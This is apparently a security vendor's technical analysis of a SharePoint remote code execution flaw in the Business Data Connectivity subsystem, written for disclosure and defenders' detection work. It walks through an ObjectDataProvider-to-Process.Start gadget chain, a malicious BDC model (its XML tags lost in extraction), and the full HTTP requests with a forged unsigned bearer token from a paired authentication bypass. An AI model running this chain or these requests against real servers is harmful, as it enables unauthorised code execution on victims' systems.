threat_intelligence1436 wordsRead on Arc Codex

Rapid7 Analysis: Microsoft SharePoint Remote Code Execution (CVE

Overview On August 11, 2026, Rapid7 and Microsoft disclosed CVE-2026-63520, a remote code execution (RCE) vulnerability affecting Microsoft SharePoint. Today we are publishing a technical analysis of CVE-2026-63520. This analysis was originally scheduled for publication 30 days after disclosure; however, as a third party has published details of CVE-2026-63520, our timeline has been expedited. A remote authenticated attacker can leverage CVE-2026-63520 to execute arbitrary code on a vulnerable SharePoint server with the privileges of the SharePoint Site’s service account. When combined with the authentication bypass, CVE-2026-55040, the resulting exploit chain is unauthenticated RCE against a vulnerable SharePoint server. When comparing the two analysis of CVE-2026-63520, we can see how we have exploited the issue by leveraging a Database Line-of-Business (LOB) system and an ObjectDataProvider based gadget chain, whilst the VulnCheck analysis has exploited the issue by leveraging a DotNetAssembly LOB system and a LosFormatter based gadget chain. Defenders should account for this when detecting CVE-2026-63520. It is highly likely other gadget chains may also be used. Analysis The following technical analysis is based upon SharePoint Server Subscription Edition version 16.0.19725.20210 . An RCE vulnerability exists in the Microsoft SharePoint Business Data Connectivity (BDC) subsystem. This is due to an unrestricted .NET type instantiation and property-setting primitive in the DbTypeReflector class, which resolves arbitrary assembly-qualified type names from BDC model XML without any allowlist or safety enforcement. An attacker who can upload a malicious .bdcm model file and trigger entity execution can instantiate any .NET type available in the Global Assembly Cache (GAC), set arbitrary properties on those instances, and leverage property-setter side-effects to achieve OS command execution. Note that there is prior work in this space that was very helpful when conducting this research. The writeup of CVE-2019-1257 by the ZDI research team discusses leveraging BDC models for unsafe .NET type instantiation. The vulnerability exists in the Microsoft.SharePoint.BusinessData.SystemSpecific.Db.DbTypeReflector.ResolveDotNetType() method, which directly calls Type.GetType() on attacker-controlled TypeDescriptor TypeName values without validation. Combined with a recursive instantiation and property-setting mechanism in the parent DotNetTypeReflector.Instantiate() method, this allows constructing a gadget chain that triggers Process.Start() through the System.Windows.Data.ObjectDataProvider class's property-setter side-effect (this gadget chain technique is well-known). The BDC subsystem uses "type reflectors" to resolve .NET types from the TypeName attribute of TypeDescriptor elements in BDC model XML. For Database-type LobSystem definitions, SharePoint uses DbTypeReflector , which inherits from DotNetTypeReflector , as shown below. // Microsoft.SharePoint.BusinessData.SystemSpecific.Db\DbTypeReflector.cs - Lines 167-186 public override Type ResolveDotNetType(string abstractTypeName, ILobSystemStruct lobSystemStruct) { if (string.IsNullOrEmpty(abstractTypeName)) { throw new ArgumentNullException("abstractTypeName"); } if (abstractTypeName.Length < 15) // <-- [1] { return base.ResolveDotNetType(abstractTypeName, lobSystemStruct); } try { return Type.GetType(abstractTypeName, throwOnError: true); // <-- [2] } catch (ArgumentException) { throw new ArgumentException(...); } } At [1] , if the type name is fewer than 15 characters (e.g. System.Int32 ), it falls through to the base class DotNetTypeReflector.ResolveDotNetType() , which has a limited type lookup path. However, at [2] , for any type name greater than 15 characters (e.g. System.Diagnostics.Process or System.Windows.Data.ObjectDataProvider ), the method calls Type.GetType() directly. This resolves any assembly-qualified type name to its corresponding Type object, with no restrictions on which assemblies or types are permitted. To construct a malicious BDC model, the following XML is used. We can see the BDC LobSystem definition has a type Database . % SqlServer localhost master True SELECT 1 AS id, 'x' AS output Text Start false true notepad.exe We can see from the above that we define a new parameter called "payload" that will instantiate a new System.Windows.Data.ObjectDataProvider instance, whose MethodName will be Start , and whose ObjectInstance will be an instance of System.Diagnostics.Process . The System.Diagnostics.Process instance will have its StartInfo member variable set to a new instance of System.Diagnostics.ProcessStartInfo , and this defines the arbitrary process to execute. When the ObjectInstance is set to the System.Diagnostics.Process instance it triggers the gadget chain to execute (a stack trace showing this is shown in the next section). Logically, we can view the gadget chain as follows: System.Windows.Data.ObjectDataProvider odp = new System.Windows.Data.ObjectDataProvider(); odp.MethodName = "Start"; System.Diagnostics.ProcessStartInfo psi = new System.Diagnostics.ProcessStartInfo(); psi.UseShellExecute = false; psi.CreateNoWindow = true; psi.FileName = "notepad.exe"; psi.Arguments = ""; System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo = psi; odp.ObjectInstance = p; // <--- Triggers RCE For testing purposes we favor a simple binary like notepad.exe which can easily be observed to execute via a tool like Process Explorer, as shown below in Figure 1. We set CreateNoWindow to true , as the target w3wp.exe IIS worker process is running in Session 0, so will have no desktop attached for displaying window forms. Figure 1: Gadget chain executing notepad.exe Walkthrough We can see a concrete example of the RCE in action by inspecting the HTTP requests required to achieve unsafe .NET type instantiation. Note that the Bearer authorization token, along with the X-RequestDigest token used in the following requests have been generated via our exploit script for the authentication bypass, CVE-2026-55040. Before we can upload the malicious BDC model, we must first create a BusinessDataMetadataCatalog folder via an HTTP POST request to the /_api/web/folders endpoint. POST /_api/web/folders HTTP/1.1 Host: win-b0i6kv698ls User-Agent: curl/7.81.0 Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJhdWQiOiAiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL3dpbi1iMGk2a3Y2OThsc0BhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAiaXNzIjogIjAwMDAwMDAzLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMEBhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAibmJmIjogMTc3Njc2NTY3MiwgImV4cCI6IDE3NzY3Njk1NzIsICJuYW1laWQiOiAiUy0xLTUtMjEtNDIwMzg4ODE1OC0yNzkzNTM2NDUwLTM5MjE2NzUyOTgtNTAwIiwgIm5paSI6ICJ1cm46b2ZmaWNlOmlkcDphY3RpdmVkaXJlY3RvcnkiLCAidHJ1c3RlZGZvcmRlbGVnYXRpb24iOiAidHJ1ZSIsICJhY3RvcnRva2VuIjogImV5SmhiR2NpT2lBaVVsTXlOVFlpTENBaWRIbHdJam9nSWtwWFZDSXNJQ0o0TlhRaU9pQWlhVjluZWpWeFpsbHdOVmxRVjBGTE1WOWZNRmxvV201cGNFeEpJbjAuZXlKcGMzTWlPaUFpTURBd01EQXdNRE10TURBd01DMHdabVl4TFdObE1EQXRNREF3TURBd01EQXdNREF3UUdGbU9UQmpZekF6TFRSaE1qWXRORFZsT1MwNU1EWmhMVFl3T1dObFltTmxZbUprWlNJc0lDSnVZVzFsYVdRaU9pQWlNREF3TURBd01ETXRNREF3TUMwd1ptWXhMV05sTURBdE1EQXdNREF3TURBd01EQXdRR0ZtT1RCall6QXpMVFJoTWpZdE5EVmxPUzA1TURaaExUWXdPV05sWW1ObFltSmtaU0lzSUNKdVltWWlPaUF4TnpjMk56WTFOamN5TENBaVpYaHdJam9nTVRjM05qYzJPVFUzTW4wLkFBQUEifQ. Accept: application/json;odata=verbose Content-Type: application/json;odata=verbose X-RequestDigest: 0x08350AA4E26C638120137515168806E0389312ED89151357A505BA8F1F7B4992AAAF9A15D4DD3D5E43ACADE857B5AE5BFFCA753401F5E5A0C3EB6F483E4188E2,21 Apr 2026 10:06:12 -0000 Content-Length: 89 {"__metadata": {"type": "SP.Folder"}, "ServerRelativeUrl": "BusinessDataMetadataCatalog"} The following response is received, confirming success. HTTP/1.1 201 Created Cache-Control: private, max-age=0 Transfer-Encoding: chunked Content-Type: application/json;odata=verbose;charset=utf-8 Expires: Mon, 06 Apr 2026 10:06:12 GMT Last-Modified: Tue, 21 Apr 2026 10:06:12 GMT Location: https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog') Server: Microsoft-IIS/10.0 X-SharePointHealthScore: 0 X-SP-SERVERSTATE: ReadOnly=0 DATASERVICEVERSION: 3.0 SPClientServiceRequestDuration: 10 SPRequestDuration: 23 X-AspNet-Version: 4.0.30319 SPRequestGuid: e01a0ca2-8b99-e0bd-6d28-73265bd44bbe request-id: e01a0ca2-8b99-e0bd-6d28-73265bd44bbe X-FRAME-OPTIONS: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com *.powerapps.com *.yammer.com *.officeapps.live.com *.office.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com; X-Powered-By: ASP.NET MicrosoftSharePointTeamServices: 16.0.0.19725 X-Content-Type-Options: nosniff X-MS-InvokeApp: 1; RequireReadOnly Date: Tue, 21 Apr 2026 10:06:12 GMT {"d":{"__metadata":{"id":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')","uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')","type":"SP.Folder"},"Activities":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')/Activities"}},"Files":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')/Files"}},"ListItemAllFields":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')/ListItemAllFields"}},"ParentFolder":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')/ParentFolder"}},"Properties":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')/Properties"}},"StorageMetrics":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')/StorageMetrics"}},"Folders":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFolderByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog')/Folders"}},"Exists":true,"IsWOPIEnabled":false,"ItemCount":0,"Name":"BusinessDataMetadataCatalog","ProgID":null,"ServerRelativeUrl":"/BusinessDataMetadataCatalog","TimeCreated":"2026-03-25T14:48:25Z","TimeLastModified":"2026-03-25T14:48:25Z","UniqueId":"588f2429-23cb-47c9-bbbf-6a0c36a04ea2","WelcomePage":""}} Next we can upload the malicious BDC model via an HTTP POST request to the /_api/web/GetFolderByServerRelativeUrl endpoint. POST /_api/web/GetFolderByServerRelativeUrl('BusinessDataMetadataCatalog')/Files/add(url='BDCMetadata.bdcm',overwrite=true) HTTP/1.1 Host: win-b0i6kv698ls User-Agent: curl/7.81.0 Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJhdWQiOiAiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL3dpbi1iMGk2a3Y2OThsc0BhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAiaXNzIjogIjAwMDAwMDAzLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMEBhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAibmJmIjogMTc3Njc2NTY3MiwgImV4cCI6IDE3NzY3Njk1NzIsICJuYW1laWQiOiAiUy0xLTUtMjEtNDIwMzg4ODE1OC0yNzkzNTM2NDUwLTM5MjE2NzUyOTgtNTAwIiwgIm5paSI6ICJ1cm46b2ZmaWNlOmlkcDphY3RpdmVkaXJlY3RvcnkiLCAidHJ1c3RlZGZvcmRlbGVnYXRpb24iOiAidHJ1ZSIsICJhY3RvcnRva2VuIjogImV5SmhiR2NpT2lBaVVsTXlOVFlpTENBaWRIbHdJam9nSWtwWFZDSXNJQ0o0TlhRaU9pQWlhVjluZWpWeFpsbHdOVmxRVjBGTE1WOWZNRmxvV201cGNFeEpJbjAuZXlKcGMzTWlPaUFpTURBd01EQXdNRE10TURBd01DMHdabVl4TFdObE1EQXRNREF3TURBd01EQXdNREF3UUdGbU9UQmpZekF6TFRSaE1qWXRORFZsT1MwNU1EWmhMVFl3T1dObFltTmxZbUprWlNJc0lDSnVZVzFsYVdRaU9pQWlNREF3TURBd01ETXRNREF3TUMwd1ptWXhMV05sTURBdE1EQXdNREF3TURBd01EQXdRR0ZtT1RCall6QXpMVFJoTWpZdE5EVmxPUzA1TURaaExUWXdPV05sWW1ObFltSmtaU0lzSUNKdVltWWlPaUF4TnpjMk56WTFOamN5TENBaVpYaHdJam9nTVRjM05qYzJPVFUzTW4wLkFBQUEifQ. Accept: application/json;odata=verbose X-RequestDigest: 0x08350AA4E26C638120137515168806E0389312ED89151357A505BA8F1F7B4992AAAF9A15D4DD3D5E43ACADE857B5AE5BFFCA753401F5E5A0C3EB6F483E4188E2,21 Apr 2026 10:06:12 -0000 Content-Length: 7296 Content-Type: application/x-www-form-urlencoded % SqlServer localhost master True SELECT 1 AS id, 'x' AS output Text Start false true notepad.exe The following response is received, confirming success. HTTP/1.1 200 OK Cache-Control: private, max-age=0 Transfer-Encoding: chunked Content-Type: application/json;odata=verbose;charset=utf-8 Expires: Mon, 06 Apr 2026 10:06:12 GMT Last-Modified: Tue, 21 Apr 2026 10:06:12 GMT Server: Microsoft-IIS/10.0 X-SharePointHealthScore: 0 X-SP-SERVERSTATE: ReadOnly=0 DATASERVICEVERSION: 3.0 SPClientServiceRequestDuration: 36 SPRequestDuration: 50 X-AspNet-Version: 4.0.30319 SPRequestGuid: e01a0ca2-fb9b-e0bd-6d28-712875f5f9e2 request-id: e01a0ca2-fb9b-e0bd-6d28-712875f5f9e2 X-FRAME-OPTIONS: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com *.powerapps.com *.yammer.com *.officeapps.live.com *.office.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com; X-Powered-By: ASP.NET MicrosoftSharePointTeamServices: 16.0.0.19725 X-Content-Type-Options: nosniff X-MS-InvokeApp: 1; RequireReadOnly Date: Tue, 21 Apr 2026 10:06:12 GMT {"d":{"__metadata":{"id":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')","uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')","type":"SP.File"},"Author":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/Author"}},"CheckedOutByUser":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/CheckedOutByUser"}},"EffectiveInformationRightsManagementSettings":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/EffectiveInformationRightsManagementSettings"}},"InformationRightsManagementSettings":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/InformationRightsManagementSettings"}},"ListItemAllFields":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/ListItemAllFields"}},"LockedByUser":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/LockedByUser"}},"ModifiedBy":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/ModifiedBy"}},"Properties":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/Properties"}},"VersionEvents":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/VersionEvents"}},"Versions":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/Versions"}},"CheckInComment":"","CheckOutType":2,"ContentTag":"{19D5ED0D-438A-477F-9943-BD5D70A86A75},35,35","CustomizedPageStatus":0,"ETag":"\"{19D5ED0D-438A-477F-9943-BD5D70A86A75},35\"","Exists":true,"IrmEnabled":false,"Length":"7296","Level":1,"LinkingUri":null,"LinkingUrl":"","MajorVersion":1,"MinorVersion":0,"Name":"BDCMetadata.bdcm","ServerRelativeUrl":"/BusinessDataMetadataCatalog/BDCMetadata.bdcm","TimeCreated":"2026-03-25T14:48:25Z","TimeLastModified":"2026-04-21T10:06:13Z","Title":null,"UIVersion":512,"UIVersionLabel":"1.0","UniqueId":"19d5ed0d-438a-477f-9943-bd5d70a86a75"}} We trigger unsafe .NET type instantiation via an HTTP POST request to the /_vti_bin/client.svc/ProcessQuery endpoint, calling the FindSpecificDefault method to locate and trigger our malicious gadget chain. POST /_vti_bin/client.svc/ProcessQuery HTTP/1.1 Host: win-b0i6kv698ls User-Agent: curl/7.81.0 Accept: */* Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJhdWQiOiAiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL3dpbi1iMGk2a3Y2OThsc0BhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAiaXNzIjogIjAwMDAwMDAzLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMEBhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAibmJmIjogMTc3Njc2NTY3MiwgImV4cCI6IDE3NzY3Njk1NzIsICJuYW1laWQiOiAiUy0xLTUtMjEtNDIwMzg4ODE1OC0yNzkzNTM2NDUwLTM5MjE2NzUyOTgtNTAwIiwgIm5paSI6ICJ1cm46b2ZmaWNlOmlkcDphY3RpdmVkaXJlY3RvcnkiLCAidHJ1c3RlZGZvcmRlbGVnYXRpb24iOiAidHJ1ZSIsICJhY3RvcnRva2VuIjogImV5SmhiR2NpT2lBaVVsTXlOVFlpTENBaWRIbHdJam9nSWtwWFZDSXNJQ0o0TlhRaU9pQWlhVjluZWpWeFpsbHdOVmxRVjBGTE1WOWZNRmxvV201cGNFeEpJbjAuZXlKcGMzTWlPaUFpTURBd01EQXdNRE10TURBd01DMHdabVl4TFdObE1EQXRNREF3TURBd01EQXdNREF3UUdGbU9UQmpZekF6TFRSaE1qWXRORFZsT1MwNU1EWmhMVFl3T1dObFltTmxZbUprWlNJc0lDSnVZVzFsYVdRaU9pQWlNREF3TURBd01ETXRNREF3TUMwd1ptWXhMV05sTURBdE1EQXdNREF3TURBd01EQXdRR0ZtT1RCall6QXpMVFJoTWpZdE5EVmxPUzA1TURaaExUWXdPV05sWW1ObFltSmtaU0lzSUNKdVltWWlPaUF4TnpjMk56WTFOamN5TENBaVpYaHdJam9nTVRjM05qYzJPVFUzTW4wLkFBQUEifQ. Content-Type: text/xml X-RequestDigest: 0x08350AA4E26C638120137515168806E0389312ED89151357A505BA8F1F7B4992AAAF9A15D4DD3D5E43ACADE857B5AE5BFFCA753401F5E5A0C3EB6F483E4188E2,21 Apr 2026 10:06:12 -0000 Content-Length: 739 If we attach a debugger, we can inspect the call stack at the point that RCE has been achieved. Note that the call from FindSpecificDefault will trigger CreateDefaultInstanceInternal which in turn will trigger the ObjectDataProvider chain and ultimately Process.Start . > System.dll!System.Diagnostics.Process.Start() (IL=0x0000, Native=0x00007FFC76E06500+0x31) [Native to Managed Transition] mscorlib.dll!System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(object obj, object[] parameters, object[] arguments) (IL=epilog, Native=0x00007FFC6E97DFE0+0x7A) mscorlib.dll!System.Reflection.RuntimeMethodInfo.Invoke(object obj, System.Reflection.BindingFlags invokeAttr, System.Reflection.Binder binder, object[] parameters, System.Globalization.CultureInfo culture) (IL=epilog, Native=0x00007FFC6E97D810+0xE7) mscorlib.dll!System.RuntimeType.InvokeMember(string name, System.Reflection.BindingFlags bindingFlags, System.Reflection.Binder binder, object target, object[] providedArgs, System.Reflection.ParameterModifier[] modifiers, System.Globalization.CultureInfo culture, string[] namedParams) (IL≈0x073D, Native=0x00007FFC71FDD820+0xC6D) mscorlib.dll!System.Type.InvokeMember(string name, System.Reflection.BindingFlags invokeAttr, System.Reflection.Binder binder, object target, object[] args, System.Globalization.CultureInfo culture) (IL=epilog, Native=0x00007FFC71FDD7C0+0x3D) PresentationFramework.dll!System.Windows.Data.ObjectDataProvider.InvokeMethodOnInstance(out System.Exception e) (IL≈0x0043, Native=0x00007FFC76E05E80+0x140) PresentationFramework.dll!System.Windows.Data.ObjectDataProvider.QueryWorker(object obj) (IL≈0x008C, Native=0x00007FFC76E04C30+0x1AF) PresentationFramework.dll!System.Windows.Data.ObjectDataProvider.BeginQuery() (IL=0x005D, Native=0x00007FFC76E00490+0x1C1) WindowsBase.dll!System.Windows.Data.DataSourceProvider.Refresh() (IL=0x000D, Native=0x00007FFC74792B30+0x36) PresentationFramework.dll!System.Windows.Data.ObjectDataProvider.ObjectInstance.set(object value) (IL=0x0078, Native=0x00007FFC76E05900+0x178) [Native to Managed Transition] mscorlib.dll!System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(object obj, object[] parameters, object[] arguments) (IL≈0x0016, Native=0x00007FFC6E97DFE0+0xDD) mscorlib.dll!System.Reflection.RuntimeMethodInfo.Invoke(object obj, System.Reflection.BindingFlags invokeAttr, System.Reflection.Binder binder, object[] parameters, System.Globalization.CultureInfo culture) (IL=epilog, Native=0x00007FFC6E97D810+0xE7) mscorlib.dll!System.Reflection.RuntimePropertyInfo.SetValue(object obj, object value, object[] index) (IL=epilog, Native=0x00007FFC720310B0+0x22) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Infrastructure.DotNetTypeReflector.SetValueOnInstanceUsingChildTypeDescriptor(object instance, object value, Microsoft.BusinessData.MetadataModel.ITypeDescriptor typeDescriptor) (IL≈0x084C, Native=0x00007FFC769B0E60+0xBC9) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Infrastructure.DotNetTypeReflector.Instantiate(Microsoft.BusinessData.MetadataModel.ITypeDescriptor typeDescriptor, Microsoft.BusinessData.MetadataModel.IMethodInstance methodInstance, uint level) (IL≈0x0581, Native=0x00007FFC769AE060+0xB37) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Infrastructure.DotNetTypeReflector.Instantiate(Microsoft.BusinessData.MetadataModel.ITypeDescriptor typeDescriptor, Microsoft.BusinessData.MetadataModel.IMethodInstance methodInstance) (IL≈0x0042, Native=0x00007FFC769ADED0+0x8E) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Runtime.ParameterRuntime.CreateDefaultInstanceInternal(Microsoft.BusinessData.MetadataModel.IParameter thisParameter, Microsoft.BusinessData.MetadataModel.IMethodInstance forMethodInstance) (IL=epilog, Native=0x00007FFC769ADE00+0xA9) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.MetadataModel.Dynamic.Parameter.Microsoft.SharePoint.BusinessData.MetadataModel.IParameterInternal.CreateDefaultInstanceInternal(Microsoft.BusinessData.MetadataModel.IMethodInstance forMethodInstance) (IL=epilog, Native=0x00007FFC769ADC20+0x3C) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Runtime.MethodRuntime.CreateDefaultParameterInstancesInternal(Microsoft.BusinessData.MetadataModel.IMethod thisMethod, Microsoft.BusinessData.MetadataModel.IMethodInstance forMethodInstance, Microsoft.BusinessData.MetadataModel.Collections.IParameterCollection parameters) (IL≈0x0052, Native=0x00007FFC769AD860+0x175) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.MetadataModel.Dynamic.Method.Microsoft.SharePoint.BusinessData.MetadataModel.IMethodInternal.CreateDefaultParameterInstancesInternal(Microsoft.BusinessData.MetadataModel.IMethodInstance forMethodInstance, Microsoft.BusinessData.MetadataModel.Collections.IParameterCollection nonReturnParameters) (IL=epilog, Native=0x00007FFC769AD7F0+0x43) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Runtime.EntityRuntime.FindSpecific(Microsoft.BusinessData.MetadataModel.IEntity thisEntity, Microsoft.BusinessData.Runtime.Identity entityInstanceIdentity, string specificFinderName, Microsoft.BusinessData.MetadataModel.ILobSystemInstance lobSystemInstance) (IL≈0x012C, Native=0x00007FFC769AC770+0x1DA) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Runtime.EntityRuntime.FindSpecific(Microsoft.BusinessData.MetadataModel.IEntity thisEntity, Microsoft.BusinessData.Runtime.Identity entityInstanceIdentity, string specificFinderName, Microsoft.BusinessData.MetadataModel.ILobSystemInstance lobSystemInstance, Microsoft.BusinessData.Runtime.OperationMode mode) (IL≈0x007D, Native=0x00007FFC769ABB70+0x10E) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Runtime.EntityRuntime.FindSpecific(Microsoft.BusinessData.MetadataModel.IEntity @this, Microsoft.BusinessData.Runtime.Identity identifierValue, Microsoft.BusinessData.MetadataModel.ILobSystemInstance lobSystemInstance, Microsoft.BusinessData.Runtime.OperationMode operationMode, bool readNow) (IL=epilog, Native=0x00007FFC769AA7E0+0x7F) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.Runtime.EntityRuntime.FindSpecific(Microsoft.BusinessData.MetadataModel.IEntity @this, Microsoft.BusinessData.Runtime.Identity identifierValue, Microsoft.BusinessData.MetadataModel.ILobSystemInstance lobSystemInstance, Microsoft.BusinessData.Runtime.OperationMode operationMode) (IL=epilog, Native=0x00007FFC769AA7A0+0x1B) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.MetadataModel.Dynamic.Entity.FindSpecific(Microsoft.BusinessData.Runtime.Identity identity, Microsoft.BusinessData.MetadataModel.ILobSystemInstance lobSystemInstance) (IL=epilog, Native=0x00007FFC769AA4C0+0x54) Microsoft.SharePoint.dll!Microsoft.SharePoint.BusinessData.MetadataModel.ClientOM.Entity.FindSpecificDefault(Microsoft.BusinessData.Runtime.Identity identity, Microsoft.SharePoint.BusinessData.MetadataModel.ClientOM.LobSystemInstance lobSystemInstance) (IL≈0x0029, Native=0x00007FFC769A9FC0+0x87) Microsoft.SharePoint.Client.ServerRuntime.dll!Microsoft.SharePoint.Client.ServerStub.InvokeMethodWithMonitoredScope(object target, string methodName, System.Xml.XmlNodeList args, Microsoft.SharePoint.Client.ProxyContext proxyContext, out bool isVoid) (IL≈0x004D, Native=0x00007FFC769A4B30+0xCB) Microsoft.SharePoint.Client.ServerRuntime.dll!Microsoft.SharePoint.Client.ClientMethodsProcessor.InvokeMethod(object obj, string methodName, System.Xml.XmlNodeList xmlargs, out bool isVoid) (IL≈0x0000, Native=0x00007FFC769A4A50+0x50) Microsoft.SharePoint.Client.ServerRuntime.dll!Microsoft.SharePoint.Client.ClientMethodsProcessor.ProcessMethod(System.Xml.XmlElement xe) (IL≈0x0076, Native=0x00007FFC769A4780+0x152) Microsoft.SharePoint.Client.ServerRuntime.dll!Microsoft.SharePoint.Client.ClientMethodsProcessor.ProcessStatements(System.Xml.XmlNode xe) (IL=0x0032, Native=0x00007FFC76970D00+0xC6) Microsoft.SharePoint.Client.ServerRuntime.dll!Microsoft.SharePoint.Client.ClientMethodsProcessor.Process() (IL=0x0104, Native=0x00007FFC7696F3A0+0x29C) Microsoft.SharePoint.Client.ServerRuntime.dll!Microsoft.SharePoint.Client.ClientRequestServiceImpl.ProcessQuery(System.IO.Stream inputStream, System.Collections.Generic.IList pendingDisposableContainer) (IL≈0x01DF, Native=0x00007FFC7696C930+0x662) Microsoft.SharePoint.Client.ServerRuntime.dll!Microsoft.SharePoint.Client.ClientRequestService.ProcessQuery(System.IO.Stream inputStream) (IL=epilog, Native=0x00007FFC7696C870+0x74)

How it works

Once you click Generate, Ollama reads this article and crafts 5 comprehension questions. Your answers are graded against the article content — general knowledge won't be enough. Score 70+ to count toward your certificate.

Questions are cached — you'll always get the same 5 for this article.